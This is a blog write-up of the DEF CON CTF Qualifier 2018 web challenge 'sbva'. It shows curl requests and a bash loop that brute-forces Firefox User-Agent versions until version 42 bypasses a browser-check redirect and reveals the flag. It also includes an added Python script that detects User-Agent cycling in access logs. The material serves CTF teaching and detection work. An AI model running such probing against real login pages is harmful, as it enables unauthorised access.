Ctrl-C Ctrl-V

A blog where I paste the stuff I clickety-clacked out over the weekend

DEF CON CTF Qualifier 2018 - sbva

Challenge description

We offer extensive website protection that stops attackers even when the admin's credentials are leaked!
Try our demo page http://0da57cd5.quals2018.oooverflow.io with username:password admin@oooverflow.io:admin to see for yourself.


writeup

Entering admin@oooverflow.io:admin at the login screen and logging in shows

Incompatible browser detected.

and then redirects to http://0da57cd5.quals2018.oooverflow.io/wrongbrowser.php.

To see what else is going on, let's look at it with curl.

ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v
*   Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> User-Agent: curl/7.57.0
> Accept: */*
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 302 Found
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sat, 12 May 2018 11:11:52 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=luj4oovknmmia6boqqbd7bkde3; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< Location: wrongbrowser.php
< 

<html>
    <style scoped>
        h1 {color:red;}
        p {color:blue;} 
    </style>
    <video id="v" autoplay> </video>
    <script>
        if (navigator.battery.charging) {
            console.log("Device is charging.")
        }
    </script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>

Because the Location header in the HTTP response is set to wrongbrowser.php, the browser redirects to wrongbrowser.php without ever rendering the page, yet the HTTP response body still contains content.
That is suspicious. Also, the content uses tags and properties you rarely see: a scoped style element, a video element with autoplay, and navigator.battery.

Maybe it is enough to set the User-Agent of a browser that supports these features in the HTTP request header.
Check the Firefox User-Agent format in the Gecko user agent string reference - HTTP | MDN.
Brute-force it by varying the version number in the User-Agent from 21 to 50.

ctfuser@kali:sbva$ cat try_FF.sh 
#!/bin/bash
# Try Firefox User-Agent strings for versions 21 through 50 and print only
# the responses that still redirect to wrongbrowser.php.
for VER in $(seq 21 50)
do
    UA="Mozilla/5.0 (Windows NT 6.1; rv:$VER.0) Gecko/20100101 Firefox/$VER.0"
    echo "$UA"
    curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: $UA" 2>&1 | grep wrongbrowser.php
done
ctfuser@kali:sbva$ ./try_FF.sh 
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
< Location: wrongbrowser.php

Only Firefox/42 does not return Location: wrongbrowser.php.
Running curl by itself with that User-Agent, the flag came back.
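As an added example (not from the original post): the server-side view of the brute force above. It parses constructed nginx access-log lines in the default combined format, pulls the Firefox major version out of the Gecko User-Agent layout the MDN reference describes, and flags any client that POSTs to login.php with several distinct versions inside one short window, which is exactly the pattern a User-Agent-gated login like this one produces when probed. The log lines, IPs and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed nginx-style access log lines (not from the original post): one
# client cycling through Firefox User-Agent versions against login.php within
# a few seconds, plus a normal client that logs in once.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2018:11:11:52 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"
203.0.113.7 - - [12/May/2018:11:11:52 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0"
203.0.113.7 - - [12/May/2018:11:11:53 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"
203.0.113.7 - - [12/May/2018:11:11:53 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0"
198.51.100.4 - - [12/May/2018:11:15:01 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Firefox UA layout per MDN: "... rv:<geckoversion>) Gecko/<geckotrail> Firefox/<firefoxversion>"
FF_VER_RE = re.compile(r'rv:(\d+)(?:\.\d+)*\) Gecko/\S+ Firefox/(\d+)')

def firefox_major(ua):
    """Return the Firefox major version from a Gecko UA string, or None."""
    m = FF_VER_RE.search(ua)
    return int(m.group(2)) if m else None

def flag_ua_cycling(log_text, path="/login.php", min_versions=3, window_s=60):
    """Return {ip: sorted majors} for clients that POST to `path` with at
    least `min_versions` distinct Firefox majors inside `window_s` seconds."""
    seen = defaultdict(list)  # ip -> [(timestamp, major)]
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != path:
            continue
        major = firefox_major(m["ua"])
        if major is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        seen[m["ip"]].append((ts, major))
    flagged = {}
    for ip, events in seen.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            majors = {v for t, v in events[i:] if (t - start).total_seconds() <= window_s}
            if len(majors) >= min_versions:
                flagged[ip] = sorted(majors)
                break
    return flagged
```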

ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"
*   Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sun, 13 May 2018 06:12:36 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=2kocc3ljm9njjsoediqasm6af6; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< 
OOO{0ld@dm1nbr0wser1sth30nlyw@y}
<html>
    <style scoped>
        h1 {color:red;}
        p {color:blue;} 
    </style>
    <video id="v" autoplay> </video>
    <script>
        if (navigator.battery.charging) {
            console.log("Device is charging.")
        }
    </script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>